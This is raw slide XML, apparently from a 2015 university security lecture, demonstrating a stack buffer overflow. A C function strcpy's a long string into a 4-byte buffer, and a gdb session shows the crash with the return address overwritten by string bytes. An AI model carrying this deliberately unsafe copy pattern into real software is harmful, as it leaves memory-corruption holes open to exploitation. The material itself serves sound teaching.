                        <a:t> (0x6f722035)</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180</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60499382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cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x21736b63)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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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181</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58911000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cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" smtClean="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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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182</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27217413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cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" smtClean="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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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183</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0x6c6c6166</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8273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08353102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cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" smtClean="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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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184</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0x6c6c6166</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0x804840d</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8273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30624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24464422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cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" smtClean="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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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185</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0xfd2c0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0x6c6c6166</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0x31303220</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5111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30624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45185644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cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" smtClean="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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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186</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0xfd2c0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0x6c6c6166</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0x31303220</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5111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30624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64207390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4" y="305134"/>
            <a:ext cx="4229810" cy="5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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main</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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289989" y="29782"/>
            <a:ext cx="4495088"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adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>overflow_example.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">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adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> Segmentation fault (core dumped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">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gdb</a:t>
            </a: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r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Starting program: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">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Program received signal SIGSEGV, Segmentation fault.0x31303220 in ?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</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0xffffd1fc  -11780</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0</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0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x8048521</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134513953</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x908ff4</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9474036</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd210</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0xffffd210</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
